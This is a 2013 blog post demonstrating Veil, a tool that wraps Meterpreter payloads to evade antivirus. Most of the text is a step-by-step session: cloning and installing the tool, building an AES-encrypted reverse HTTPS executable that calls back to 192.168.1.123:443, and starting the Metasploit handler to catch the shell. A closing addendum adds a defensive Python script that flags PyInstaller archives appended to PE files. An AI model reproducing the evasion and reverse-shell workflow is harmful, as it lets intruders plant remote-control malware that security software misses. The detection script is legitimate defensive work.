June 3, 2013

A Payload Generator to Bypass Antivirus

Dmitriy Evteev
Another "cobblestone" thrown at most of today's antivirus products comes from a build called Veil. This magic toolkit is an MSF-compatible payload generator (it is built on top of msfvenom). After the final build through Pyinstaller or Py2Exe, the resulting binary is currently detected by only two antivirus solutions (and not the most popular ones...).


Installation and use


"- Kali
- Backtrack
- Kali
- Backtrack
- Okay, take both" (c) anonymous

# git clone https://github.com/ChrisTruncer/Veil.git
# cd Veil/setup
# ./setup.sh
...
# ./Veil.py

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 3
[?] What's the Local Host IP Address: 192.168.1.123
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

55 INFO: wrote Z:rootvVeilpayload.spec
...
8134 INFO: Appending archive to EXE Z:rootvVeildistpayload.exe

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse HTTPS handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_https
 LHOST   = 192.168.1.123
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

# file payload.exe 
payload.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
...
# msfconsole
msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://192.168.1.123:443/
[*] Starting the payload handler...
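The low detection count quoted above is a verdict on the embedded payload (Veil's menu offers it base64-encoded, ARC4-, DES- or AES-wrapped), but the build step itself leaves a structural fingerprint: the "Appending archive to EXE" line shows PyInstaller writing its archive after the last PE section, and that archive ends in a cookie whose magic bytes are b"MEI\x0c\x0b\x0a\x0b\x0e". The script below is an added defensive example, not code from Veil or from the original post; it walks the PE section table to find where the overlay starts and reports whether a PyInstaller cookie lives in it, independent of how the Python inside was obfuscated. The sample executable it scans is constructed by hand (the section layout, the "PYZ-dummy-archive" filler and the zeroed cookie fields are assumptions) so the script runs offline under Python 3.

```python
"""Flag PE files that carry a PyInstaller archive as an overlay.

Added defensive example; it does not depend on anything Veil-specific.
The only facts it relies on are that a PyInstaller one-file build appends
its archive after the last section, and that the archive's trailing cookie
starts with the magic below.  The cookie's remaining fields vary between
PyInstaller versions, so the scan keys on the magic alone.
"""
import struct
import sys

PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def overlay_offset(data: bytes):
    """Return the offset where the PE overlay begins, or None if not a PE.

    The overlay is everything past the end of the section that reaches
    furthest into the file (PointerToRawData + SizeOfRawData).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    try:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
        opt_hdr_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
        section_table = e_lfanew + 24 + opt_hdr_size  # COFF header is 24 bytes incl. signature
        end = 0
        for i in range(num_sections):
            hdr = section_table + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes
            size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)
            end = max(end, ptr_raw + size_raw)
    except struct.error:
        return None  # truncated header: treat as not a well-formed PE
    return end


def classify(data: bytes) -> dict:
    """Summarise overlay presence and whether a PyInstaller cookie sits in it."""
    overlay = overlay_offset(data)
    cookie = data.rfind(PYINSTALLER_MAGIC)  # cookie is at the tail, so search backwards
    return {
        "is_pe": overlay is not None,
        "overlay_offset": overlay,
        "overlay_size": (len(data) - overlay) if overlay is not None else 0,
        "pyinstaller_cookie_at": cookie if cookie >= 0 else None,
        "pyinstaller_in_overlay": overlay is not None and cookie >= overlay,
    }


def build_sample_pe(overlay: bytes) -> bytes:
    """Construct a minimal 32-bit PE with one section plus the given overlay.

    Constructed for the demo only: not loadable, just well-formed enough for
    the header walk above (SizeOfOptionalHeader is 0 to keep it short).
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections=1, timestamp/symbols=0, SizeOfOptionalHeader=0
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # relocs, linenums, nrelocs, nlinenums, Characteristics (code|exec|read)
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + section).ljust(0x200, b"\0")
    text = b"\xC3".ljust(0x200, b"\0")  # a lone RET, padded to SizeOfRawData
    return headers + text + overlay


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return classify(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(scan_file(sys.argv[1]))
    else:
        # Constructed sample: archive filler, then the cookie magic and zeroed fields.
        sample = build_sample_pe(b"PYZ-dummy-archive" + PYINSTALLER_MAGIC + b"\0" * 16)
        print(classify(sample))
```

Run it against a real file with `python3 scan.py payload.exe`; a hit on "pyinstaller_in_overlay" says only that the binary is a PyInstaller one-file build, which is common for legitimate tooling too, so treat it as a triage signal to pair with the handler traffic the post describes (an outbound HTTPS session to an unfamiliar host right after the process starts), not as a conviction on its own.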